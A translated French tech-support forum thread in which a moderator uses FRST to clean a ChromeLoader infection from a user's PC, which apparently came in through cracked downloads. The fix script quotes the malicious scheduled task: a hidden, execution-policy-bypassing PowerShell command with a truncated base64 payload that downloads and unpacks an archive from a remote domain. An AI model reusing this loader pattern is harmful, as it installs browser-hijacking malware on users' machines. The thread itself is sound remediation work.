View original (French)

Powershell that closes and opens my pages.

Solved
Victor -  
bazfile Posted messages 58480 Registration date   Status Moderator Last intervention   -
Hello, since this morning my pages and applications are closing and reopening by themselves. I looked in my task manager and it seems that it's "Powershell" that is causing this. I thought it might be a virus, but after a full scan of my PC with Windows Defender, no threats were detected... I'm reaching out to someone who might have a solution to my problem :)

2 answers

Answer 1 / 2
bazfile Posted messages 58480 Registration date   Status Moderator Last intervention   20 264
 
Hello,
Download FRST once downloaded save it on the desktop then right-click on FRST and choose Run as administrator you will have this:

Click on Scan

Be sure to wait for the messages indicating that the scan is complete


At the end of the scan, you will have two text files on the desktop FRST and Addition, .
Then send the FRST and ADDITION reports to CJOINT see THIS TUTORIAL then provide the two links generated by Cjoint in your response.

--
bazfile
Moderator/Security Contributor.
A hello, a response, a thank you are always appreciated.
1
Victor
 
Hello and thank you, here are the 2 reports: Addition: https://www.cjoint.com/c/LAjqFa5zYam
FRST: https://www.cjoint.com/c/LAjqFKlaH2m
0
bazfile Posted messages 58480 Registration date   Status Moderator Last intervention   20 264 > Victor
 
Hello,
You download and install anything, for example: 
- Explosive_3.0.6_Cracked.zip
- Crack office (With eyes and wings).rar

Avoid this kind of stuff; it will only bring you problems.

Procedure to follow in the order indicated:

1- Open FRST as an administrator by right-clicking on FRST and choosing run as administrator
2 - Copy the entire script that is in the box below: 
Start::
CreateRestorePoint:
CloseProcesses:
Task: {1960845C-AABF-423F-A739-4026F400D4B3} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgB5AGYAbABlAHgAaQBiAGkAbABpAHQAdQBrAHkALgBjAG8AIgAKAAoAJABpAHMATwBwAGUAbgAgAD0AIAAwAAoAJABkAGQAIAA9ACAAMAAKACQAdgBlAHIAIAA9ACAAMAAKAAoAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAdABlAHIAIAAiAG4AYQBtAGUAPQAnAGMAaAByAG8AbQBlAC4AZQB4AGUAJwAiACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoACQBpAGYAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuACIAKQB7AAoACQAJAGIAcgBlAGEAawAKAAkAfQAKAAoACQAkAGkAcwBPAHAAZQBuACAAPQAgADEACgB9AAoACgBpAGYAKAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACkAKQB7AAoACgAJAAkAdAByAHkAewAKAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYc31DOFM17hEAURUXP1EYAjch8jZ1F0XQSgfQ0jA== /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (data item has 4315 characters more). (No file)
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2021.lnk:AF199A10EB [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2020.lnk:1A5FAF1E4E [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Product Verification Tool.lnk:122F03124D [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Assistant Update for Windows 10.lnk:628A25EA7E [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk:09A0A90EF3 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks Multi-Instance Manager.lnk:FE00AE19CB [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks.lnk:6BCDFBBA1F [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk:95AF280D4D [10]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [474]
Edge Extension: (No name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ATTENTION (Restriction - Zones)
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [ut] => "C:\Users\aston\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED (No file)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (No file)
C:\Users\aston\Downloads\Explosive_3.0.6_Cracked.zip
C:\Users\aston\Downloads\Crack office (With eyes and wings).rar
2022-01-09 11:58 - 2022-01-09 11:58 - 000012828 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
Hosts:
EmptyTemp:
End::

3- Once the script is copied, click on Fix; FRST will automatically take the script from the clipboard.



Let the fix process complete. Once finished, you will be asked to restart your PC; do so as soon as prompted, see below.
Then, once your computer has restarted:
4- You will have a Fixlog file on your desktop; then send these reports to https://www.cjoint.com/ see this tutorial then provide the link generated by Cjoint in your next message.

5- CHECK AND TELL ME IF YOUR PROBLEM IS STILL PRESENT


FOR INFORMATION:

Your version of Windows 10 is not up to date; to check, go to this page, click on Update now, this will start the download of the Microsoft tool, just open it and it will allow you to update Windows 10 to the latest version and tell you if it is compatible with your PC. Be careful, this update takes some time; if you have a laptop, plug it into the mains, as it would be a shame to run out of battery before the update is finished.
0
Victor > bazfile Posted messages 58480 Registration date   Status Moderator Last intervention  
 
Here is the Fixlog link: https://www.cjoint.com/c/LAjrdWvY88m
and thank you for the information about the Windows 10 update! I will keep you posted if I see PowerShell closing pages again, but for now it seems to be working fine.
0
bazfile Posted messages 58480 Registration date   Status Moderator Last intervention   20 264 > Victor
 
The fixlog is OK, it should normally be fine.
1
Answer 2 / 2
Victor
 
It looks like there are no more bugs. Thank you so much for your help!!! It's great ;)
0
bazfile Posted messages 58480 Registration date   Status Moderator Last intervention   20 264
 
You can uninstall FRST, rename the FRST file you downloaded to uninstall, then once the file is renamed, open it; the uninstallation will occur automatically via a restart of the PC.

I mark the topic as resolved.
@+ on CCM.
0